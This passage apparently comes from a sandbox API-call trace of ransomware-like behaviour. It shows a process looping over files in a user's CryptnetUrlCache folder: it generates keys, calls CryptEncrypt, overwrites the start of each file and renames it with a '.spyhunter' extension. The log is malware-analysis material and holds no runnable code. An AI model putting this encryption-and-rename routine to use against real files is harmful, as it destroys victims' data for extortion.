out: lpNewFilePointer=0x0) returned 1 [0152.685] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec34, lpOverlapped=0x0 | out: lpBuffer=0x270ec74*, lpNumberOfBytesWritten=0x270ec34*=0x4, lpOverlapped=0x0) returned 1 [0152.685] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec34, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec34*=0x30, lpOverlapped=0x0) returned 1 [0152.685] CloseHandle (hObject=0xa0) returned 1 [0152.686] GetProcessHeap () returned 0x2c0000 [0152.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.686] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.spyhunter") returned 161 [0152.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f6e15778dc8e326895c606fbfa0392eb.spyhunter")) returned 1 [0152.686] GetProcessHeap () returned 0x2c0000 [0152.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.686] GetProcessHeap () returned 0x2c0000 [0152.686] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.686] GetProcessHeap () returned 0x2c0000 [0152.687] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe1b18 | out: hHeap=0x2c0000) returned 1 [0152.687] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec78 | out: pbBuffer=0x270ec78) returned 1 [0152.687] GetProcessHeap () returned 0x2c0000 [0152.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.687] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec70*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec70*=0x30) returned 1 [0152.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.687] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned 151 [0152.687] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", lpSrch=".txt") returned 0x0 [0152.687] GetProcessHeap () returned 0x2c0000 [0152.687] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.687] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec34*=0x1cf, lpOverlapped=0x0) returned 1 [0152.688] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.688] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x270ec34, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec34*=0x1cf, lpOverlapped=0x0) returned 1 [0152.688] GetProcessHeap () returned 0x2c0000 [0152.688] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.688] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.688] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec34, lpOverlapped=0x0 | out: lpBuffer=0x270ec74*, lpNumberOfBytesWritten=0x270ec34*=0x4, lpOverlapped=0x0) returned 1 [0152.689] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec34, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec34*=0x30, lpOverlapped=0x0) returned 1 [0152.689] CloseHandle (hObject=0xa0) returned 1 [0152.689] GetProcessHeap () returned 0x2c0000 [0152.689] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.689] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.spyhunter") returned 161 [0152.689] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_f2318f7ab33980a131a265454c39ca30.spyhunter")) returned 1 [0152.689] GetProcessHeap () returned 0x2c0000 [0152.689] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.689] GetProcessHeap () returned 0x2c0000 [0152.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.690] GetProcessHeap () returned 0x2c0000 [0152.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe19a0 | out: hHeap=0x2c0000) returned 1 [0152.690] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec70 | out: pbBuffer=0x270ec70) returned 1 [0152.690] GetProcessHeap () returned 0x2c0000 [0152.690] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.690] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec68*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec68*=0x30) returned 1 [0152.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.690] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned 151 [0152.691] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", lpSrch=".txt") returned 0x0 [0152.691] GetProcessHeap () returned 0x2c0000 [0152.691] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.691] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec2c*=0x1cf, lpOverlapped=0x0) returned 1 [0152.691] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.691] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x270ec2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec2c*=0x1cf, lpOverlapped=0x0) returned 1 [0152.692] GetProcessHeap () returned 0x2c0000 [0152.692] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.692] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.692] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec2c, lpOverlapped=0x0 | out: lpBuffer=0x270ec6c*, lpNumberOfBytesWritten=0x270ec2c*=0x4, lpOverlapped=0x0) returned 1 [0152.692] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec2c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec2c*=0x30, lpOverlapped=0x0) returned 1 [0152.692] CloseHandle (hObject=0xa0) returned 1 [0152.692] GetProcessHeap () returned 0x2c0000 [0152.692] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.692] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.spyhunter") returned 161 [0152.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_e907d7a04657714b5b06d18bc920971e.spyhunter")) returned 1 [0152.693] GetProcessHeap () returned 0x2c0000 [0152.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.693] GetProcessHeap () returned 0x2c0000 [0152.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.693] GetProcessHeap () returned 0x2c0000 [0152.693] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe1828 | out: hHeap=0x2c0000) returned 1 [0152.693] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec70 | out: pbBuffer=0x270ec70) returned 1 [0152.693] GetProcessHeap () returned 0x2c0000 [0152.693] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.693] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec68*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec68*=0x30) returned 1 [0152.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0152.694] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned 151 [0152.694] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", lpSrch=".txt") returned 0x0 [0152.694] GetProcessHeap () returned 0x2c0000 [0152.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0152.694] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ec2c*=0x1cf, lpOverlapped=0x0) returned 1 [0152.695] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.695] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x270ec2c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ec2c*=0x1cf, lpOverlapped=0x0) returned 1 [0152.695] GetProcessHeap () returned 0x2c0000 [0152.695] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0152.695] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.695] WriteFile (in: hFile=0xa0, lpBuffer=0x270ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec2c, lpOverlapped=0x0 | out: lpBuffer=0x270ec6c*, lpNumberOfBytesWritten=0x270ec2c*=0x4, lpOverlapped=0x0) returned 1 [0152.695] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec2c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec2c*=0x30, lpOverlapped=0x0) returned 1 [0152.695] CloseHandle (hObject=0xa0) returned 1 [0152.695] GetProcessHeap () returned 0x2c0000 [0152.695] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.695] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.spyhunter") returned 161 [0152.696] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_c080da2ae431c1a7f3b0c147eeb043ed.spyhunter")) returned 1 [0152.696] GetProcessHeap () returned 0x2c0000 [0152.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.696] GetProcessHeap () returned 0x2c0000 [0152.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.696] GetProcessHeap () returned 0x2c0000 [0152.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe16b0 | out: hHeap=0x2c0000) returned 1 [0152.696] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec68 | out: pbBuffer=0x270ec68) returned 1 [0152.696] GetProcessHeap () returned 0x2c0000 [0152.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.696] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec60*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec60*=0x30) returned 1 [0152.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.699] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned 151 [0152.699] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", lpSrch=".txt") returned 0x0 [0152.699] GetProcessHeap () returned 0x2c0000 [0152.699] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.699] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ec24*=0x1cf, lpOverlapped=0x0) returned 1 [0152.700] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.700] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x270ec24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ec24*=0x1cf, lpOverlapped=0x0) returned 1 [0152.700] GetProcessHeap () returned 0x2c0000 [0152.700] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.700] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.701] WriteFile (in: hFile=0xb0, lpBuffer=0x270ec64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec24, lpOverlapped=0x0 | out: lpBuffer=0x270ec64*, lpNumberOfBytesWritten=0x270ec24*=0x4, lpOverlapped=0x0) returned 1 [0152.701] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec24, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec24*=0x30, lpOverlapped=0x0) returned 1 [0152.701] CloseHandle (hObject=0xb0) returned 1 [0152.701] GetProcessHeap () returned 0x2c0000 [0152.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0152.701] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.spyhunter") returned 161 [0152.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_74e943f7dab6d19e37e4854057155778.spyhunter")) returned 1 [0152.702] GetProcessHeap () returned 0x2c0000 [0152.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0152.702] GetProcessHeap () returned 0x2c0000 [0152.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0152.702] GetProcessHeap () returned 0x2c0000 [0152.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe1538 | out: hHeap=0x2c0000) returned 1 [0152.702] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ec68 | out: pbBuffer=0x270ec68) returned 1 [0152.702] GetProcessHeap () returned 0x2c0000 [0152.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0152.702] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x270ec60*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x270ec60*=0x30) returned 1 [0152.702] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_5ea65844b9ef5670a9c002cbd85b10a4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.703] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned 151 [0152.703] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", lpSrch=".txt") returned 0x0 [0152.703] GetProcessHeap () returned 0x2c0000 [0152.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.703] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ec24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ec24*=0x1cf, lpOverlapped=0x0) returned 1 [0152.703] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.704] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x270ec24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ec24*=0x1cf, lpOverlapped=0x0) returned 1 [0152.704] GetProcessHeap () returned 0x2c0000 [0152.704] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.704] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.704] WriteFile (in: hFile=0xb0, lpBuffer=0x270ec64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ec24, lpOverlapped=0x0 | out: lpBuffer=0x270ec64*, lpNumberOfBytesWritten=0x270ec24*=0x4, lpOverlapped=0x0) returned 1 [0152.704] WriteFile (in: hFile=0xb0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ec24, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x270ec24*=0x30, lpOverlapped=0x0) returned 1 [0152.704] CloseHandle (hObject=0xb0) returned 1 [0152.704] GetProcessHeap () returned 0x2c0000 [0152.704] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0152.704] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4.spyhunter") returned 161 [0152.704] MoveFileW 